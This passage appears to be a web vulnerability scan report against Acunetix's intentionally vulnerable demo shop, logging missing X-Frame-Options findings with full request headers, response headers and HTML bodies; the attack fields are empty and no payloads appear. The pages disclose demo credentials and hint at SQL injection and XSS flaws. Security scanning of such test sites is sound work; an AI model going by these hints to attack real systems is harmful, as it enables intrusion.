src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5311 |
Response Body - size: 5,311 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Paintings</h2><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=4 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:54 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/login.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/login.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5523 |
Response Body - size: 5,523 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>login page</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h3>If you are already registered please enter your login information below:</h3><br> <form name="loginform" method="post" action="userinfo.php"> <table cellpadding="4" cellspacing="1"> <tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr> <tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr> </table> </form> </div> <div class="story"> <h3> You can also <a href="signup.php">signup here</a>.<br> Signup disabled. Please use the username <font color='red'>test</font> and the password <font color='red'>test</font>. </h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 268 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 975 |
Response Body - size: 975 bytes. |
<html>
<div id="content"> <div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 €</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 €</a></td></table></tr></div></div> </html> |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 310 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 327 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 314 bytes. |
GET http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 170 |
Response Body - size: 170 bytes. |
Warning: mysql_connect(): Connection refused in /hj/var/www/database_connect.php on line 2
Website is out of order. Please visit back later. Thank you for understanding. |
URL | http://testphp.vulnweb.com/product.php?pic=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6428 |
Response Body - size: 6,428 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> 